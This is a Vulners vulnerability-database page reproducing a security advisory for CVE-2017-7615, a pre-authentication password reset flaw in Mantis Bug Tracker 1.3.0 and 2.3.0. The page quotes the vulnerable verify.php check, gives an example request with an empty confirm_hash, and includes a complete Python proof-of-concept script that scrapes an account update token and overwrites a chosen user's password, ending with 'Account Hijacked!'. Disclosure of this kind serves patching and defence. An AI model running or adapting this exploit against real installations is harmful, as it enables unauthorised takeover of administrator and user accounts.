Vulners
Lucene search
Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset Exploit
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | CVE-2017-7615 | 16 Apr 201700:00 | – | circl |
 | MantisBT Arbitrary Password Reset Vulnerability | 18 Apr 201700:00 | – | cnvd |
 | Mantis Bug Tracker verify.php confirm_hash Remote Password Reset (CVE-2017-7615) | 15 May 201700:00 | – | checkpoint_advisories |
 | CVE-2017-7615 | 16 Apr 201714:45 | – | cve |
 | CVE-2017-7615 | 16 Apr 201714:45 | – | cvelist |
 | Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset | 16 Apr 201700:00 | – | exploitdb |
| Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated) | 18 Sep 202000:00 | – | exploitdb |
 | Mantis Bug Tracker 1.3.02.3.0 - Password Reset | 16 Apr 201700:00 | – | exploitpack |
 | MantisBT allows arbitrary password reset | 13 May 202201:16 | – | github |
 | MantisBT password reset | 9 Jul 201700:14 | – | metasploit |
10
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec
Vendor:
================
www.mantisbt.org
Product:
==================
Mantis Bug Tracker
v1.3.0 / 2.3.0
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
Vulnerability Type:
===============================
Pre-Auth Remote Password Reset
CVE Reference:
==============
CVE-2017-7615
Security Issue:
================
Mantis account verification page 'verify.php' allows resetting ANY user's password.
Remote un-authenticated attackers can send HTTP GET requests to Hijack ANY Mantis accounts by guessing the ID / username.
Vulnerable code:
In verify.php line 66:
if( $f_confirm_hash != $t_token_confirm_hash ) {
trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR );
}
This code attempts to verify a user account and compares hashes for a user request.
However, by supplying empty value we easily bypass the security check.
e.g.
http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
This will then allow you to change passwords and hijack ANY mantisbt accounts.
All version >= 1.3.0 as well as 2.3.0 are affected, 1.2.x versions are not affected.
References:
============
https://mantisbt.org/bugs/view.php?id=22690#c56509
POC Video URL:
==============
https://vimeo.com/213144905
Exploit/POC:
=============
import cookielib,urllib,urllib2,time
print 'Mantis Bug Tracker >= v1.3.0 - 2.3.0'
print '1.2.x versions are not affected'
print 'Remote Password Reset 0day Exploit'
print 'Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n'
IP=raw_input("[Mantis Victim IP]>")
realname=raw_input("[Username]")
verify_user_id=raw_input("[User ID]")
passwd=raw_input("[New Password]")
TARGET = 'http://'+IP+'/mantisbt-2.3.0/verify.php?id='+verify_user_id+'&confirm_hash='
values={}
account_update_token=''
#verify_user_id='1' #Admin = 1
#realname='administrator' #Must be known or guessed.
#REQUEST 1, get Mantis account_update_token
cookies = cookielib.CookieJar()
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0),
urllib2.HTTPCookieProcessor(cookies))
res = opener.open(TARGET)
arr=res.readlines()
for s in arr:
if 'account_update_token' in s:
break
#print s[61:-38]
ACCT_TOKEN=s[61:-38]
time.sleep(0.3)
#REQUEST 2 Hijack the Admin Account
TARGET='http://'+IP+'/mantisbt-2.3.0/account_update.php'
values = {'verify_user_id' : '1',
'account_update_token' : ACCT_TOKEN,
'realname' : realname,
'password' : passwd,
'password_confirm' : passwd}
data = urllib.urlencode(values)
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0),
urllib2.HTTPCookieProcessor(cookies))
response = opener.open(TARGET, data)
the_page = response.read()
http_headers = response.info()
#print http_headers
print response.getcode()
print 'Account Hijacked!'
time.sleep(2)
# 0day.today [2018-03-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Apr 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.92451